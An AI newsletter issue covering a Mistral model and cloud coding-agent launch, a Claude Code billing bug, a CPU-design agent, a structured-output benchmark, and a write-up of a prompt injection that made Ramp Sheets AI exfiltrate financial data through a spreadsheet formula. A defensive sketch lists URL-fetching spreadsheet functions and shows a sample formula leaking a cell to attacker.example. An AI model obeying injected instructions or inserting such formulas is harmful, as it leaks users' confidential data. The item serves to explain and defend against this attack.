tinAI #099: Mistral Medium 3.5 + Vibe remote agents: coding agents that run in the cloud and open a PR when done

tinAI summarizes public sources, adds editorial context for readers, and keeps the source link in each item.

Top story

Mistral Medium 3.5 + Vibe remote agents: coding agents that run in the cloud and open a PR when done · 8 min https://mistral.ai/news/vibe-remote-agents-mistral-medium-3-5

Mistral Medium 3.5 launches as a dense 128B-parameter model with a 256k context window, scoring 77.6% on SWE-Bench Verified, ahead of both Devstral 2 and Qwen3.5 397B A17B. The more interesting part, though, is Vibe remote agents: you launch a coding session from Le Chat or the Vibe CLI, the agent runs in a cloud sandbox, opens a pull request when it finishes, and can work on many tasks in parallel, so you are not stuck with a single local terminal. API pricing of $1.5/$7.5 per million tokens (input/output) puts it roughly between Sonnet and Opus, but open weights on Hugging Face under a modified MIT license mean you can self-host it on as few as 4 GPUs. If your workflow is already “kick off a task, wait for the agent to finish, review”, this is a model worth trying in place of your default Claude/Devstral.
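To make the quoted pricing concrete, here is a minimal sketch that turns the $1.5/$7.5 per million tokens figures into a per-session cost. The function name and the token counts in the example are hypothetical, and the calculation assumes flat list pricing with no caching or batch discounts.

```python
# Prices quoted in the item above, in USD per one million tokens.
INPUT_USD_PER_MTOK = 1.5
OUTPUT_USD_PER_MTOK = 7.5


def estimate_cost_usd(input_tokens: int, output_tokens: int) -> float:
    """Return the API cost in USD at the quoted list prices (no discounts assumed)."""
    total = input_tokens * INPUT_USD_PER_MTOK + output_tokens * OUTPUT_USD_PER_MTOK
    return total / 1_000_000


# Hypothetical agent session: 2M tokens read, 200k tokens written.
session_cost = estimate_cost_usd(2_000_000, 200_000)
print(f"${session_cost:.2f}")  # prints "$4.50"
```

Agent sessions tend to read far more than they write, so the input price often dominates the bill even though the output price is five times higher.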

Models & Tools

Claude Code bug: the string HERMES.md in a commit message causes requests to be billed as extra usage · 4 min https://github.com/anthropics/claude-code/issues/53262

A developer found via binary search that if a repo's git commit history contains the case-sensitive string HERMES.md, Claude Code routes requests to extra usage billing instead of plan quota. He burned $200 in credits while the dashboard still showed 86% of weekly capacity remaining. Lowercase hermes.md, HERMES.txt, and AGENTS.md are all fine; only that exact string triggers it. The bug lies in server-side content-based routing on the commit messages included in the system prompt. If your repo has that file, or mentions it in commit messages, check your usage now.
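A quick way to see whether a repo is exposed is to scan its commit messages for the exact string. The sketch below is an assumption about how one might check locally, not the method used in the bug report; the function names are hypothetical, and `repo_commit_messages` simply shells out to `git log`.

```python
import subprocess

TRIGGER = "HERMES.md"  # exact, case-sensitive string named in the bug report


def messages_with_trigger(messages: list[str], trigger: str = TRIGGER) -> list[str]:
    """Return the commit messages that contain the trigger, case-sensitively."""
    return [m for m in messages if trigger in m]


def repo_commit_messages(repo_path: str = ".") -> list[str]:
    """Read full commit messages from git, using a NUL byte as the separator."""
    out = subprocess.run(
        ["git", "-C", repo_path, "log", "--format=%B%x00"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [m.strip() for m in out.split("\x00") if m.strip()]


# Illustrative messages mirroring the variants mentioned in the item above.
sample = ["add HERMES.md notes", "rename hermes.md", "update HERMES.txt", "edit AGENTS.md"]
print(messages_with_trigger(sample))  # prints "['add HERMES.md notes']"
```

On a real checkout, `messages_with_trigger(repo_commit_messages("."))` would list the affected commits, if any.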

Ramp Sheets AI hit by a prompt injection that exfiltrates financial data via a formula · 5 min https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials

PromptArmor demonstrates how an indirect prompt injection hidden in an external dataset (white-on-white text) makes Ramp Sheets AI insert a formula that issues a network request, exfiltrating confidential data without user approval. The bug was fixed in March, but the lesson applies to any AI agent that writes to spreadsheets: an agent that both reads untrusted data and has permission to insert formulas gives an attacker an exfiltration channel inside the tool itself. Claude for Excel previously had a similar vulnerability.
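One mitigation in this spirit is to screen agent-written cells for formulas that can reach the network before they are committed to the sheet. The sketch below is an illustration only: the deny-list is an assumed sample of spreadsheet functions that fetch URLs (it is not taken from the PromptArmor write-up), and the function name is hypothetical.

```python
import re

# Assumed sample of spreadsheet functions that can fetch a URL; not exhaustive.
NETWORK_FUNCTIONS = {
    "IMPORTDATA", "IMPORTXML", "IMPORTHTML", "IMPORTFEED", "IMAGE", "WEBSERVICE",
}

# Matches an identifier immediately followed by "(", i.e. a function call.
_FUNC_CALL = re.compile(r"([A-Za-z][A-Za-z0-9_.]*)\s*\(")


def network_functions_in(cell_value: str) -> set[str]:
    """Return deny-listed functions called in a formula cell; empty set otherwise."""
    if not cell_value.lstrip().startswith("="):
        return set()  # plain value, not a formula
    called = {name.upper() for name in _FUNC_CALL.findall(cell_value)}
    return called & NETWORK_FUNCTIONS


# A formula that would leak cell A1 as a query parameter.
print(network_functions_in('=IMAGE("https://attacker.example/?d=" & A1)'))  # prints "{'IMAGE'}"
```

This is a naive textual check: it can produce false positives on string literals that happen to look like calls, and a deny-list will miss functions it does not know about. Requiring user approval for any agent-written formula is the stricter alternative.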

Research & Insights

Auto-Architecture: Karpathy's autoresearch agent designs a RISC-V CPU automatically · 9 min https://github.com/FeSens/auto-arch-tournament/blob/main/docs/auto-arch-tournament-blog-post.md

Karpathy's autoresearch loop (propose / implement / measure / keep wins) has just been ported to a new domain: CPU design. The author applies it to an in-order RV32IM core written in SystemVerilog, using riscv-formal + Verilator cosim + nextpnr P&R as the fitness function. After 73 hypotheses and 9h 51m of wall-clock time, the agent found 10 improvements (including an instruction-replay table, static branch prediction, a hot/cold ALU split, and pending-store retirement) that raised CoreMark by 91.9% over baseline. It is a practical blueprint for using LLMs to optimize code in domains outside their comfort zone of Python and gradient descent.
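The propose / implement / measure / keep wins loop can be sketched as a greedy search. This is a generic illustration under stated assumptions, not the project's code: `propose` stands in for the LLM writing a change, `measure` stands in for the verification and benchmark pipeline and returns `None` when a candidate fails verification, and the toy functions below are hypothetical.

```python
from typing import Callable, Optional, Tuple, TypeVar

Design = TypeVar("Design")


def autoresearch(
    baseline: Design,
    propose: Callable[[Design, int], Design],
    measure: Callable[[Design], Optional[float]],
    rounds: int,
) -> Tuple[Design, float, int]:
    """Greedy keep-the-wins loop; returns (best design, best score, number of wins)."""
    best = baseline
    best_score = measure(baseline)
    if best_score is None:
        raise ValueError("baseline must pass verification")
    wins = 0
    for i in range(rounds):
        candidate = propose(best, i)   # propose + implement a change
        score = measure(candidate)     # verify, then benchmark
        if score is not None and score > best_score:
            best, best_score, wins = candidate, score, wins + 1  # keep the win
    return best, best_score, wins


# Toy stand-ins: a "design" is an int, the score peaks at 7, and values above 9 fail verification.
steps = [3, -1, 5, 2, -4, 1]


def toy_propose(best: int, i: int) -> int:
    return best + steps[i]


def toy_measure(design: int) -> Optional[float]:
    return None if design > 9 else -abs(design - 7)


result = autoresearch(0, toy_propose, toy_measure, rounds=len(steps))
print(result)  # prints "(8, -1, 2)"
```

Treating a verification failure as an automatic rejection is what keeps the loop honest: a faster design that is no longer correct never becomes the new baseline.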

SOB benchmark: measuring Value Accuracy instead of just schema compliance for structured output · 5 min https://interfaze.ai/blog/introducing-structured-output-benchmark

Most structured output benchmarks only check schema validity: a model that emits correctly formatted JSON with wrong values still scores 100%. SOB separates out Value Accuracy and Perfect Response, testing on text (HotpotQA), image (olmOCR-bench), and audio (AMI Meeting Corpus) through a single scoring harness. The top 5 show that structural metrics have saturated near 100%; the real differences between models lie in value accuracy. If you are choosing a model for an extraction pipeline, this leaderboard is more informative than a JSON validation rate.
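The gap between schema validity and value accuracy is easy to see on a single record. The sketch below is a simplified illustration, not SOB's actual scoring code: it assumes a flat, non-empty expected record, treats "schema valid" as matching keys and value types, and defines value accuracy as the fraction of fields whose values match exactly. The field names are hypothetical.

```python
import json


def score_output(raw: str, expected: dict) -> dict:
    """Score one model output against a flat, non-empty expected record."""
    try:
        parsed = json.loads(raw)
    except json.JSONDecodeError:
        parsed = None
    if not isinstance(parsed, dict):
        return {"schema_valid": False, "value_accuracy": 0.0, "perfect": False}
    # Simplified schema check: same keys, and each value has the expected type.
    schema_valid = parsed.keys() == expected.keys() and all(
        type(parsed[k]) is type(expected[k]) for k in expected
    )
    # Value accuracy: fraction of expected fields reproduced exactly.
    correct = sum(1 for k in expected if k in parsed and parsed[k] == expected[k])
    return {
        "schema_valid": schema_valid,
        "value_accuracy": correct / len(expected),
        "perfect": schema_valid and correct == len(expected),
    }


expected = {"vendor": "Acme", "total": 120.5, "currency": "USD"}
raw = '{"vendor": "Acme", "total": 102.5, "currency": "USD"}'  # digits transposed
result = score_output(raw, expected)
print(result["schema_valid"], result["perfect"])  # prints "True False"
```

Here the output passes the schema check but gets only two of three values right, which is exactly the case a validation-rate metric would score as a full success.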

— tinAI
